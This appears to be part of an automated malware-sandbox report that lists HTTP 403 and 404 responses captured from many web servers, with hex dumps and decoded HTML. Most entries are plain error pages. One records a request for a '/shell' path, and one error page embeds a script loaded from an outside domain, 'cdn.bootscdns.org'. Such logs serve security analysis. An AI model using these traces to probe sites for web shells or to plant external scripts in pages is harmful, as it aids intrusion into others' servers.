      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:31:37 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:31:37 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Fri, 26 Jan 2024 14:31:41 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:41 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 14:31:42 GMTContent-Type: text/htmlContent-Length: 144Connection: keep-aliveProxy-Status: 0000201404026000x-tt-trace-host: 01f638a4b5c719e9d5169f8225650676bb9672edf57703706e053a29c1b1328b1f56fd1da9db090985ddc6f4dfdbee1724x-tt-trace-tag: id=00;cdn-cache=missx-tt-trace-id: 00-2401262231424708A51D6969F615E27C-01E2D7A15838AF21-00Server: TLBX-TT-LOGID: 202401262231424708A51D6969F615E27CData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 54 4c 42 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>TLB</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jan 2024 14:31:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:47 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 14:31:47 GMTServer: Apache/2.2.17 (EL)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 37 20 28 45 4c 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.17 (EL) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 22:28:42 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:49 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Byte-nginxDate: Fri, 26 Jan 2024 14:31:51 GMTContent-Type: application/octet-streamConnection: keep-aliveByte-Error-Code: 0060Content-Length: 24via: cache03.bjcedux-request-ip: 81.181.57.74x-tt-trace-tag: id=5x-response-cinfo: 81.181.57.74x-response-cache: missData Raw: 31 32 37 2e 30 2e 30 2e 31 20 63 6f 6e 66 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 127.0.0.1 conf not found
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:51 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:52 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:31:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 66 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 62 6f 6f 74 73 63 64 6e 73 2e 6f 72 67 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 36 2e 34 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: fd<html><head><title>404 Not Found</title><script type="text/javascript" src="https://cdn.bootscdns.org/ajax/libs/jquery/3.6.4/jquery.js"></script></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:31:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Date: Fri, 26 Jan 2024 14:31:53 GMTServer: fwebserverData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:55 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:58 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:58 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:32:01 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:32:01 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 26 Jan 2024 14:32:01 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:32:01 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
